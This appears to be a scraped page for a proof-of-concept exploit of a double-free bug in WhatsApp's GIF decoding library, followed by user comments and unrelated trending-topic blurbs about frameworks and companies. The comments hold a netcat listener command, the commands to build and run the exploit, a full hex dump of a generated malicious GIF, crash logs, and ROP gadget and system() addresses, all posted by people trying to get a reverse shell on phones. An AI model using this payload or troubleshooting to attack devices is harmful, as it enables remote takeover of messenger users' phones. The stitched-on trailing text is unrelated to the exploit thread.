Simple POC for exploiting WhatsApp double-free bug in DDGifSlurp in decoding.c in libpl_droidsonroids_gif
Home Page: https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/
Please, is it the adresse of system() and gadget same on android 8.1 (samsung) ?
Hello awakened1712 can you help me i whant to run your script i clone the script but how can i generate the gif and run the shell i hope you answer me.
the commande i use :
nc -lvp 5555
gcc -o exploit egif_lib.c exploit.c
./exploit /root/Desktop/11y.gif
buffer = 0x7fff2a088260 size = 266
47 49 46 38 39 61 18 00 0A 00 F2 00 00 66 CC CC
FF FF FF 00 00 00 33 99 66 99 FF CC 00 00 00 00
00 00 00 00 00 2C 00 00 00 00 08 00 15 00 00 08
9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 84 9C 09 B0
C5 07 00 00 00 74 DE E4 11 F3 06 0F 08 37 63 40
C4 C8 21 C3 45 0C 1B 38 5C C8 70 71 43 06 08 1A
34 68 D0 00 C1 07 C4 1C 34 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 54 12 7C C0 C5 07 00 00 00 EE FF FF 2C 00 00
00 00 1C 0F 00 00 00 00 2C 00 00 00 00 1C 0F 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 2C 00 00 00 00
18 00 0A 00 0F 00 01 00 00 3B
i send gif file to my phone but no shell was creat . my android version 5.1.1
Hi,
I have android 9 with Whatsapp 2.19.203.
I found the gadget and the system with your android apk that you publish.
When I'm enter the Whatsapp gallery after I sent the gif file as document the app was crashed.
Do You have any idea why?
Logs:
12-09 14:08:28.563 27111 27111 F DEBUG : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
12-09 14:08:28.563 27111 27111 F DEBUG : Build fingerprint: 'samsung/beyond1ltexx/beyond1:9/PPR1.180610.011/G973FXXS3ASJG:user/release-keys'
12-09 14:08:28.564 27111 27111 F DEBUG : Revision: '26'
12-09 14:08:28.564 27111 27111 F DEBUG : ABI: 'arm'
12-09 14:08:28.564 27111 27111 F DEBUG : pid: 26898, tid: 26911, name: ReferenceQueueD >>> com.whatsapp <<<
12-09 14:08:28.564 27111 27111 F DEBUG : signal 6 (SIGABRT), code -6 (SI_TKILL), fault addr --------
12-09 14:08:28.564 27111 27111 F DEBUG : Abort message: 'Invalid address 0xffcccc66 passed to free: value not allocated'
12-09 14:08:28.564 27111 27111 F DEBUG : r0 00000000 r1 0000691f r2 00000006 r3 00000008
12-09 14:08:28.564 27111 27111 F DEBUG : r4 00006912 r5 0000691f r6 cae103d4 r7 0000010c
12-09 14:08:28.564 27111 27111 F DEBUG : r8 e4d13808 r9 c0f43c28 r10 70b41170 r11 c0f42c00
12-09 14:08:28.564 27111 27111 F DEBUG : ip cae10370 sp cae103c0 lr e7069f01 pc e7060efe
12-09 14:08:28.755 27111 27111 F DEBUG :
12-09 14:08:28.755 27111 27111 F DEBUG : backtrace:
12-09 14:08:28.755 27111 27111 F DEBUG : #00 pc 0001cefe /system/lib/libc.so (abort+58)
12-09 14:08:28.755 27111 27111 F DEBUG : #1 pc 0007e5f9 /system/lib/libc.so (ifree+880)
12-09 14:08:28.756 27111 27111 F DEBUG : #2 pc 0007e717 /system/lib/libc.so (je_free+70)
12-09 14:08:28.756 27111 27111 F DEBUG : #3 pc 0035aa7f /system/lib/libhwui.so (SkDeque::~SkDeque()+30)
12-09 14:08:28.756 27111 27111 F DEBUG : #4 pc 00382f05 /system/lib/libhwui.so (SkBitmapDevice::~SkBitmapDevice()+16)
12-09 14:08:28.756 27111 27111 F DEBUG : #5 pc 0035684f /system/lib/libhwui.so (SkCanvas::internalRestore()+538)
12-09 14:08:28.756 27111 27111 F DEBUG : #6 pc 00358a6d /system/lib/libhwui.so (SkCanvas::~SkCanvas()+28)
12-09 14:08:28.756 27111 27111 F DEBUG : #7 pc 000d732d /system/lib/libhwui.so (SkCanvas::~SkCanvas()+2)
12-09 14:08:28.756 27111 27111 F DEBUG : #8 pc 00380b1d /system/lib/libhwui.so (android::SkiaCanvas::~SkiaCanvas()+92)
12-09 14:08:28.756 27111 27111 F DEBUG : #9 pc 000d3363 /system/lib/libhwui.so (android::SkiaCanvas::~SkiaCanvas()+2)
12-09 14:08:28.756 27111 27111 F DEBUG : #10 pc 000794a9 /system/framework/arm/boot-core-libart.oat (offset 0x77000) (java.math.NativeBN.BN_copy [DEDUPED]+120)
12-09 14:08:28.756 27111 27111 F DEBUG : #11 pc 0010ddff /system/framework/arm/boot-core-libart.oat (offset 0x77000) (libcore.util.NativeAllocationRegistry$CleanerThunk.run+86)
12-09 14:08:28.756 27111 27111 F DEBUG : #12 pc 0030af63 /system/framework/arm/boot.oat (offset 0x10d000) (sun.misc.Cleaner.clean+90)
12-09 14:08:28.756 27111 27111 F DEBUG : #13 pc 0016ea31 /system/framework/arm/boot.oat (offset 0x10d000) (java.lang.ref.ReferenceQueue.enqueueLocked+168)
12-09 14:08:28.756 27111 27111 F DEBUG : #14 pc 0016eb1d /system/framework/arm/boot.oat (offset 0x10d000) (java.lang.ref.ReferenceQueue.enqueuePending+148)
12-09 14:08:28.756 27111 27111 F DEBUG : #15 pc 0014bcb9 /system/framework/arm/boot-core-libart.oat (offset 0x77000) (java.lang.Daemons$ReferenceQueueDaemon.runInternal+232)
12-09 14:08:28.756 27111 27111 F DEBUG : #16 pc 000ef64b /system/framework/arm/boot-core-libart.oat (offset 0x77000) (java.lang.Daemons$Daemon.run+66)
12-09 14:08:28.756 27111 27111 F DEBUG : #17 pc 00219669 /system/framework/arm/boot.oat (offset 0x10d000) (java.lang.Thread.run+64)
12-09 14:08:28.756 27111 27111 F DEBUG : #18 pc 00411375 /system/lib/libart.so (art_quick_invoke_stub_internal+68)
12-09 14:08:28.756 27111 27111 F DEBUG : #19 pc 003ea469 /system/lib/libart.so (art_quick_invoke_stub+224)
12-09 14:08:28.756 27111 27111 F DEBUG : #20 pc 000a1615 /system/lib/libart.so (art::ArtMethod::Invoke(art::Thread*, unsigned int*, unsigned int, art::JValue*, char const*)+136)
12-09 14:08:28.756 27111 27111 F DEBUG : #21 pc 0034b0b5 /system/lib/libart.so (art::(anonymous namespace)::InvokeWithArgArray(art::ScopedObjectAccessAlreadyRunnable const&, art::ArtMethod*, art::(anonymous namespace)::ArgArray*, art::JValue*, char const*)+52)
12-09 14:08:28.756 27111 27111 F DEBUG : #22 pc 0034be0d /system/lib/libart.so (art::InvokeVirtualOrInterfaceWithJValues(art::ScopedObjectAccessAlreadyRunnable const&, _jobject*, _jmethodID*, jvalue*)+320)
12-09 14:08:28.756 27111 27111 F DEBUG : #23 pc 0036d1f3 /system/lib/libart.so (art::Thread::CreateCallback(void*)+866)
12-09 14:08:28.756 27111 27111 F DEBUG : #24 pc 00064939 /system/lib/libc.so (__pthread_start(void*)+140)
12-09 14:08:28.757 27111 27111 F DEBUG : #25 pc 0001e3c5 /system/lib/libc.so (__start_thread+24)
Hello, does this work in the latest version of "Whatsapp"? And which host and port should we listen to with netcat?
Hello, I got ROP gadget at address 0x00159b80
0x00159b80: ldr x8, [x19, #0x18]; add x0, x19, #0x20; blr x8;
I added this address to the base address of libhwui.so (0x7710ddd000). I also got the system address and changed these in the code, but the exploit is not working. Process gets segfault and doesn't connect to my netcat listener. I'm testing on Android 9.
Any idea?
Listening on 0.0.0.0 1111 Connection received on 127.0.0.1 51318
why i cannot get reverse shell?
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
Django
The Web framework for perfectionists with deadlines.
Laravel
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft
Open source projects and samples from Microsoft.
Google
Google โค๏ธ Open Source for everyone.
Alibaba
Alibaba Open Source for everyone
D3
Data-Driven Documents codes.
Tencent
China tencent open source team.
